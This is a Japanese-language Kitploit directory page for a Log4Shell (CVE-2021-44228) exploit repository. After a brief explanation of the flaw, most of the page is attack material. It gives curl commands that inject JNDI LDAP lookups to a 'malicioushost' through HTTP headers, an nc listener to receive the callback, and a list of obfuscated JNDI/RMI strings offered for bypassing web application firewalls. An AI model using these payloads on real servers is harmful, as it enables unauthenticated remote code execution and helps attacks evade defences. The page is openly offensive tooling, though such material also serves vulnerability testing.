Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-CVE-2021-44228 — CVE-2021-44228 | Kitploit
ツール/GitHubGitHub/sud0x00/log4j-cve-2021-44228
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスリモートアクセスツール
GitHubsud0x00/log4j-cve-2021-44228

log4j-CVE-2021-44228

CVE-2021-44228

リポジトリを見る
54年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j-CVE-2021-44228

2021年12月5日、Apacheは広く使用されているLog4jロギングサービスの脆弱性(後にCVE-2021-44228として特定)を確認しました。Log4shellとしても知られるこの脆弱性は、Javaロギングライブラリを利用するアプリケーションを実行している場合、認証なしのリモートコード実行を可能にし、攻撃者が影響を受けるサーバーの完全な制御を獲得できるようにします。Log4jは、幅広いDevOpsフレームワーク、エンタープライズITシステム、ベンダーソフトウェア、クラウド製品に広く統合されています。

悪意のあるリモートホストで以下を実行して、サーバーがLog4jエクスプロイトに対して脆弱かどうかを確認します

curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'

nc -lnvp mport

HTTP-POSTリクエストを含むその他のバリエーションも、脆弱性の確認に使用できます

curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port

Webアプリケーションファイアウォールをバイパスするには

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
ツールをダウンロード